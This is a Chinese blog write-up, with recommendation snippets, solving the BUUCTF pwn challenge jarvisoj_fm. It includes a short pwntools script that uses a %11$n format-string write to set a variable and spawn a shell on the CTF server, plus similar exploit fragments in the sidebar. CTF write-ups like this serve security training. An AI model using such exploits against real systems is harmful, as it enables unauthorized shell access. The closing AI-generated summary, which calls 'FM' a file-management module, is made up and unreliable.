BUUCTF-jarvisoj_fm1-WP

最新推荐文章于 2025-02-25 21:39:52 发布

Rt1Text

最新推荐文章于 2025-02-25 21:39:52 发布

阅读量338

点赞数

分类专栏： BUUCTF 文章标签：安全 linux

本文链接：https://blog.youkuaiyun.com/arraylocalhost/article/details/127601147

版权

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

博客围绕Linux安全展开，介绍了checksec、IDA和EXP相关内容。checksec方面，存在canary且题目提示fm时考虑格式化字符串；IDA中发现main函数有明显格式化字符串漏洞，将x值赋为4可getshell，确定x在第11个位置后编写脚本。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.checksec

有canary ,题目提升fm,考虑格式化字符串

2.IDA

1.main

明显的格式化字符串漏洞

将x值赋为4就可以getshell

确定x的位置

参数在第11个位置

x的地址,然后编写脚本,挺简单的

3.EXP

#!/usr/bin/env python
from pwn import *
p=remote("node4.buuoj.cn",29539)
elf=ELF('./24fm')
x_addr=0x0804a02c
payload=p32(x_addr)+'%11$n'
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF：jarvisoj_fm（write up）

qq_44768749的博客

08-24

498

BUUCTF：jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析开启了栈不可执行、canary以及部分RELRO保护 0x02 运行运行未发现什么异常，但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单，关键部分都在主函数中，有getshell的函数，当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3，需要利用格式化字符串漏洞改写x的值测试格式

BUUCTF jarvisoj exp整合

菜的只能随便写写博客

02-24

639

0x01 jarvisoj_level0 简单的地址改写 from pwn import * p = remote('node3.buuoj.cn', 26882) #p = process('./level0') shell_addr = 0x0000000000400596 p.sendline('a'*0x88+p64(shell_addr)) p.interactive() ...

1 条评论您还未登录，请先登录后发表或查看评论

【CTF】jarvisoj_fm 1

凉水的博客

07-06

622

jarvisoj_fm

2301_81060697的博客

02-25

487

关键函数：fmtstr_payload

JarvisOJ fm

PLpa的博客

07-09

1200

这一题是一道格式化字符串漏洞题关于格式化漏洞的基础，你可以看我前面的博客，里面有提到：https://blog.youkuaiyun.com/qq_43986365/article/details/94896862 拿到这一题，我们仍然是先查看保护：我们可以看到，简单的格式化漏洞题只开了NX和CANARY保护，好的。接下来我们就可以进入IDA中看一下程序的具体逻辑：在这里，我们可以看到有一个明显的...

[PWN] BUUCTF jarvisoj_fm

空城惜梦的博客

06-05

454

[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro，canary,nx 执行程序，观察程序的逻辑，在打印出输入的字符后，会打印出3! 32IDA打开查看主要函数main，观察到在红框那里存在的很明显的格式化字符串漏洞，而且当x==4时，会得到flag，根据之前执行的程序可知，未修改x之前x的值为3，则若要修改x，需要利用格式化字符串漏洞的任意地址读写解题思路利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",

mb_bios_ga-b85m-d3v_v2.x_fm.zip

11-02

主板型号为：技嘉B85M-D3V rev2.0版本官方BIOS，已刷入NVME模块支持NVME SSD启动

福玛特扫地机器人310-FM-R360_YZ-K1使用指南

"福玛特扫地机器人310-FM-R360_YZ-K1的使用说明书详细介绍了该产品的安全使用、组件介绍、操作方法、维护保养、故障代码、产品参数以及保修信息，旨在帮助用户更好地理解和操作这款智能扫地机。" 本文将深入探讨...

探索SDR-Radio V3_64-bit：2018年最新软件无线电技术

2. **多频段接收**：该软件支持多种无线电波段的接收，包括但不限于FM、AM、短波(HF)、航空波段(VHF/UHF)以及卫星通信波段等，极大拓展了用户的接收范围。 3. **高级信号处理**：SDR-Radio V3内置了丰富的信号处理...

buuctf jarvisoj_fm

pondzhang的专栏

03-19

330

存在格式化字符串漏洞而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n，意思将0x0804A02C的x地址写入32位大小的一个...

buuctf jarvisoj_fm

carol2358的博客

05-04

255

先运行， AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位，然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...

jarvisoj_fm【BUUCTF】

qq_41696518的博客

08-31

372

jarvisoj_fm【BUUCTF】

[BUUCTF]PWN——jarvisoj_fm

mcmuyanga的博客

10-31

1419

jarvisoj_fm 附件步骤：例行检查，32位，开启了canary和nx保护运行一下程序，看看大概的情况 32位ida载入，shift+f12检索程序里的字符串，看见了 " /bin/sh " 字符串 双击跟进，找到程序主体，当x=4的时候会执行system（/bin/sh）第10行存在格式化字符串漏洞，我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置，手动输入计算得到偏移为11 利用x的地址配合上%11

BUUCTF pwn——jarvisoj_fm

CNS-Enterprise BCC-1701-J

04-13

280

BUUCTF 做题练习

jarvisoj_fm 1 格式化字符串漏洞

m0_49766582的博客

06-01

238

1 from pwn import * 2 p = remote("node3.buuoj.cn",29263) 3 payload = p32(0x0804A02C)+b"%11$n" 4 p.sendline(payload) 5 p.interactive() ~ 需要覆盖x的值，将x的值变为4，利用格式化字符串漏洞。

BUUCTF ciscn_2019_ne_5 & jarvisoj_fm

红叶的博客

11-01

776

只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。

BUUCTF 刷题 jarvisoj_fm

Helloity的博客

02-13

424

题目：BUUCTF在线评测 checksec一下，32位程序，有canary，开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下，发现一个明显的printf格式化字符串漏洞，我们需要控制x的值为4，就可以获得binsh int __cd

jarvisoj_fm 1

最新发布

03-26

### JarvisOJ FM 功能概述 JarvisOJ 是一个在线编程练习平台，旨在帮助用户提升其逆向工程技能。其中的 FM（File Management）模块主要用于文件管理操作，涉及二进制文件分析、调试以及反汇编等内容[^1]。 FM 的核心功能包括但不限于以下几个方面： - **文件上传与解析** 用户可以通过该模块上传目标文件并对其进行初步解析，提取基本信息以便后续处理。 - **动态调试支持** 提供了一个集成环境用于运行和调试程序，允许设置断点、查看寄存器状态及内存数据等操作。 - **静态反汇编展示** 对于上传的目标可执行文件，能够生成对应的汇编代码视图，便于理解程序逻辑结构。以下是实现简单文件读取的一个 Python 示例代码片段： ```python def read_binary_file(file_path): try: with open(file_path, 'rb') as file: content = file.read() return content except Exception as e: print(f"Error reading the binary file: {e}") ``` 此代码展示了如何打开并读取一个二进制文件的内容到内存中，这是许多基于文件的操作的第一步，在 JarvisOJ FM 中可能被用来加载待分析样本。 ### 常见问题解答当使用 JarvisOJ FM 进行学习时可能会遇到一些典型疑问如下： #### 文件无法成功上传？这可能是由于服务器端配置限制或者客户端网络连接不稳定引起的问题。建议检查所选文件大小是否超出规定上限，并确认当前互联网状况良好再尝试重新提交作业。 #### 调试过程中崩溃怎么办？如果在利用内置工具对项目进行单步跟踪期间发生异常终止现象，则需仔细核查输入参数合法性；另外也要留意是否存在未初始化变量引用等情况造成非法访问错误。 #### 如何更高效地阅读大量汇编码？除了依赖自动化插件辅助外，培养扎实的基础理论知识同样重要。平时应多加实践各类算法转换过程中的机器指令表达形式，逐渐形成快速定位关键路径的能力。